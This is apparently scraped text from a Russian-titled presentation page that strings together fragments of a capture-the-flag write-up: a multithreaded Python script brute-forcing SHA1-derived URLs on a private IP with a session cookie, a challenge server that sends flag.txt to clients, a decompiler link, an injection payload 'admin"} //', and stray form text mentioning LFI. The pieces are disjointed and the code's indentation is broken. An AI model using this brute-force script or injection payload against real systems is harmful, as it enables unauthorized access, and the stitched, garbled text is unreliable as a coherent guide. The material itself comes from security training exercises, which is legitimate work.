Презентация на тему Coral good$

s = requests.Session()
cookie = 'X19CSUdfQjBTU19f|1392544181|f29297121d75bd9074f4ef9bc7db2d8e2a9255c5'

c = dict(user=cookie)
for x in range(start, stop):
if found:
return
identif = hashlib.sha1('__BIG_B0SS__' + str(x)).hexdigest()
url = 'http://10.0.133.201:9237/detail/' + identif
r = s.get(url,cookies=c)
if r.status_code == 200:
print url
found = True
return

for x in range(0, 20):
threading.Thread(target=brute, args=(x*2500, x*2500 + 2499)).start()

https://github.com/wibiti/uncompyle2

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 6068))
sock.listen(5)
while True:
try:

conn, addr = sock.accept()
logging.info('Client %s connected' % addr[0])
conn.send('Type command:\n\r')
cmd = conn.recv(5)
conn.send('Command received\n\r')
if cmd == 'shoot':
port = random.randint(1025, 65535)
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with open('flag.txt') as f:
flag = f.read(20).decode('utf-8')
udp_sock.sendto(flag, (addr[0], port))
logging.info('Flag sended to %s' % addr[0])
conn.close()
except:
continue

JavaScript, Binary JSON

exploit:
admin"} //

method="get">
Choose a part of sky

to see that. Maybe you found something awesome... 

1
2
3
4
5

LFI???? NO WAY!!!